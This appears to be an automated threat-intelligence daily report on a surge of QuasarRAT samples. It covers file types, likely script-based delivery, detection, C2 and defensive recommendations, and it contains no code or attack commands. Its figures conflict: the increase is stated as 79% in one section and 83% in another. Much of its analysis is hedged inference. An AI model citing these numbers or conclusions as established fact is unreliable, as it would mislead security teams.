Daily Summary
QuasarRAT activity surged today with 11 new samples collected, marking a 79% increase over the 7-day average of 6. This rise continues an escalating trend, suggesting renewed campaign efforts or operational tempo from threat actors. The spike is significant enough to warrant heightened monitoring for SOC teams.
New Samples Detected
Today’s 11 samples break down by file type as follows: PowerShell scripts (.ps1) dominate with 5 samples, followed by executable files (.exe) with 3, batch scripts (.bat) with 2, and VBScript (.vbs) with 1. The heavy reliance on .ps1 files is noteworthy, as QuasarRAT typically favors compiled executables for initial payloads. This shift may indicate threat actors are leveraging living-off-the-land techniques, using PowerShell to load the RAT in memory and evade static file detections.
Distribution Methods
Based on the file type distribution, delivery appears to be phasing away from direct executable drops and toward script-based attack chains. The .ps1 samples likely serve as downloaders or in-memory loaders, while .bat and .vbs files may be used for persistence or staging. This aligns with recent phishing campaigns where malicious scripts are attached to emails or hosted on file-sharing services. No download URLs were observed in today’s IOCs, but the script-heavy approach suggests the actual payloads are fetched from remote servers during execution.
Detection Rate
Current AV engines are likely catching many legacy QuasarRAT variants, but the shift to script-based distribution may reduce detection rates. PowerShell-based loaders can bypass signature scans by encoding payloads or using reflection to load assemblies. SOC teams should verify that their EDR solutions have behavioral rules for suspicious PowerShell execution, as traditional file scanners may miss these new variants.
C2 Infrastructure
No new C2 servers were observed today, and no geographic patterns emerged from the 11 new IOCs. The lack of fresh C2 infrastructure suggests threat actors are reusing existing servers or cycling through previously known hosts. This could indicate a focus on payload delivery and execution rather than C2 operations, or that C2 data is being withheld from current collection.
7-Day Trend
Today’s 11 samples break a week of relatively stable counts near the mean. Activity is clearly ramping up, with the 83% increase from the average pointing to an active campaign that may continue into the coming days.
Security Analysis
A non-obvious observation: the dominance of .ps1 files over .exe files represents a notable tactic shift for QuasarRAT. Historically, this family is dropped as a compiled executable, often bundled with legitimate software or disguised as a crack. Today’s data suggests actors are moving to a multi-stage execution model where the initial script downloads the RAT binary from a remote host. This increases operational security for the attacker, as the initial payload is more difficult to analyze statically. Actionable recommendation: implement PowerShell execution policy restrictions and monitor Event ID 4104 (Script Block Logging) for suspicious invocation patterns. Block outbound connections from PowerShell to uncommon ports or domains, and ensure your SOC has visibility into script-derived process trees.